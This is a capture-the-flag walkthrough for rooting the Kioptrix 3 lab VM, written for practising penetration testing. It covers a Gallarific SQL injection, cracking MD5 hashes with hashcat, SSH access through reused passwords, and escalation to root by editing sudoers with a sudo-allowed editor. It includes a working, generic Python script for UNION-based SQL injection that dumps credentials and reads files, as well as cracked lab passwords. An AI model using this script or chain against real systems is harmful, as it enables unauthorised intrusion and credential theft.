Overview
Kioptrix 3 is a B2R (boot-to-root) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by chaining the vulnerabilities it exposes into a full system compromise.
Vulnerabilities Exploited:
- SQL Injection
- Password reuse
- Sudo Misconfiguration
Lab Setup:
- VMware Workstation for the virtual machines
- Kali Linux VM in bridged mode
- Kioptrix 3 in bridged mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
Reconnaissance/Scanning
I used netdiscover to find the IP address of the target VM.
root@kali:~# netdiscover
Target VM IP address: 192.168.8.105
I added the target to my /etc/hosts file as instructed by the author of the VM (https://www.vulnhub.com/entry/kioptrix-level-12-3,24/), so that links to kioptrix3.com resolve to the VM.
root@kali:~# cat /etc/hosts
192.168.8.105 kioptrix3.com
Next, I used nmap to find the open ports and services on the target machine (all TCP ports, with version and OS detection).
root@kali:~# nmap -p- -A 192.168.8.105
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 00:02 EDT
Nmap scan report for 192.168.8.105
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:62:9A:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.8.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
Only SSH and HTTP are exposed, and the SSH build is old enough that the web server is the more promising target. A website is hosted on port 80, so let's explore it in the browser.
In the page's HTML comments I found a link to the gallery admin panel.
The title of the admin login page shows that the gallery is Gallarific Photo Gallery.
Exploitation
A quick search turns up a known SQL injection in Gallarific Photo Gallery.
Using the SQL injection, I dumped the admin username and password, which the application stores in plain text,
and logged into the Gallarific admin panel.
That is a dead end: the admin panel offers nothing useful for getting a shell.
Next I used the injection to read the local file system (MySQL's LOAD_FILE()). Reading /etc/passwd, /etc/group and /etc/my.cnf succeeded, but no other local configuration file was readable. LOAD_FILE() returns NULL for any file the MySQL server process cannot read, so this is a quick way to tell which files are world-readable, not a general file read.
Let's enumerate the other databases and tables through the injection instead (information_schema).
Two default databases are present, and "gallery" is the only user-created one. Listing the tables in the gallery database,
dev_accounts stands out as an interesting table name. Listing its columns,
and dumping username:password from it, gives two developer accounts with hashed passwords.
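The enumeration sequence above, as an added example that is not part of the original write-up: a small Python helper that builds the UNION-based payloads for each step (column count via ORDER BY, database/table/column listing from information_schema, the dev_accounts dump, and LOAD_FILE), sends them, and pulls the result back out of the HTML between marker strings. The injection URL (http://kioptrix3.com/gallery/gallery.php?id=), the vulnerable parameter, the six-column UNION and the slot that is rendered are assumptions about the Gallarific injection, not details the post states; find_column_count() shows how to measure the column count on your own target. String literals are passed as MySQL hex literals so the payload contains no quote characters, which sidesteps magic_quotes-style escaping on a PHP 5.2 host.

```python
import re
import urllib.parse
import urllib.request

# Assumptions, not from the write-up: where the Gallarific injection lives
# and which UNION column the page renders.
BASE_URL = "http://kioptrix3.com/gallery/gallery.php?id="
COLUMNS = 6   # number of columns in the vulnerable SELECT (measure with ORDER BY)
SLOT = 2      # 0-based index of the UNION column whose value is rendered


def hx(s: str) -> str:
    """Encode a string as a MySQL hex literal so the payload needs no quotes."""
    return "0x" + s.encode().hex()


MARK_L, MARK_R = hx("[[["), hx("]]]")   # markers to locate our value in the HTML


def union_payload(expr: str, columns: int = COLUMNS, slot: int = SLOT) -> str:
    """Build `-1 UNION SELECT 1,2,CONCAT(marker,expr,marker),4,...-- -`.

    A negative id empties the legitimate row, so only the UNION row is rendered.
    """
    cols = [str(i + 1) for i in range(columns)]
    cols[slot] = f"CONCAT({MARK_L},{expr},{MARK_R})"
    return "-1 UNION SELECT " + ",".join(cols) + "-- -"


def extract(html: str):
    """Return every marker-delimited value found in a response body.

    An empty list means the expression evaluated to NULL (e.g. LOAD_FILE on a
    file MySQL cannot read): CONCAT with NULL is NULL, so no markers appear.
    """
    return re.findall(r"\[\[\[(.*?)\]\]\]", html, re.S)


def find_column_count(probe, max_cols: int = 20) -> int:
    """ORDER BY n succeeds while n <= column count; the first failure reveals it.

    `probe(payload) -> bool` reports whether the page still rendered normally.
    """
    for n in range(1, max_cols + 1):
        if not probe(f"1 ORDER BY {n}-- -"):
            return n - 1
    return max_cols


# One expression per step of the walkthrough. GROUP_CONCAT folds many rows into
# a single rendered value; hx() keeps table/file names free of quote characters.
STEPS = {
    "version":   "version()",
    "user":      "user()",
    "databases": "(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)",
    "tables":    "(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables "
                 f"WHERE table_schema={hx('gallery')})",
    "columns":   "(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns "
                 f"WHERE table_name={hx('dev_accounts')})",
    "creds":     f"(SELECT GROUP_CONCAT(username,{hx(':')},password) FROM dev_accounts)",
    "passwd":    f"LOAD_FILE({hx('/etc/passwd')})",
}


def fetch(payload: str) -> str:
    """Send one injected value of the id parameter and return the response body."""
    url = BASE_URL + urllib.parse.quote(payload, safe="")
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Heuristic assumption: a bad ORDER BY makes MySQL's error text reach the page.
    cols = find_column_count(lambda p: "Unknown column" not in fetch(p))
    print(f"[columns] {cols}")
    for name, expr in STEPS.items():
        values = extract(fetch(union_payload(expr, cols)))
        print(f"[{name}] {values[0] if values else '<NULL: no marker in response>'}")
```

The ORDER BY probe assumes MySQL errors are echoed into the page; on an application that swallows errors, compare the response against the baseline page instead. Everything else is plain MySQL and works against any UNION-injectable integer parameter once the column count and rendered slot are known.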
The hashes are unsalted MD5 (hashcat mode 0), which I cracked with hashcat and rockyou.txt in a few seconds.
root@kali:~# hashcat -m 0 -a 0 --force -o found1.txt hashes.txt /root/rockyou.txt
hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /root/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Wed May 30 05:06:33 2018 (5 secs)
Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  3110.3 kH/s (0.68ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10838016/14344385 (75.56%)
Rejected.........: 0/10838016 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> March3490
HWMon.Dev.#1.....: N/A

Started: Wed May 30 05:06:32 2018
Stopped: Wed May 30 05:06:39 2018
root@kali:~# cat found1.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
root@kali:~#
The cracked credentials map to the two dev_accounts users:
- dreg:Mast3r (dreg does not have sudo privileges)
- loneferret:starwars (loneferret has sudo privileges)
Both users also exist in /etc/passwd, and the developers reused their gallery passwords for their system accounts, so the same credentials work over SSH. That password reuse is what turns a web-application SQL injection into a shell.
root@kali:~# ssh loneferret@192.168.8.105
loneferret@192.168.8.105's password:
Permission denied, please try again.
loneferret@192.168.8.105's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Wed May 9 15:35:14 2018 from 192.168.8.103
loneferret@Kioptrix3:~$
Privilege Escalation
A README in loneferret's home directory spells out the company policy: use 'sudo ht' for editing files. sudo -l confirms that loneferret may run /usr/local/bin/ht as root without a password. The negated !/usr/bin/su entry only blocks su by name, and sudoers negations are not a security boundary anyway (the sudoers manual notes a user can simply copy or rename the binary). ht is a hex/text editor, so running it as root is an arbitrary file write as root. The binary is also setuid and setgid root (-rwsr-sr-x), which is a separate problem on its own.
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht
With ht running as root, I opened /etc/sudoers and added a rule granting loneferret full sudo access. One caveat: ht does not validate sudoers syntax the way visudo does, and a syntax error in /etc/sudoers makes sudo refuse every command for every user, so keep the root ht session open until sudo -l confirms the new rule parses.
loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret#
And we have root!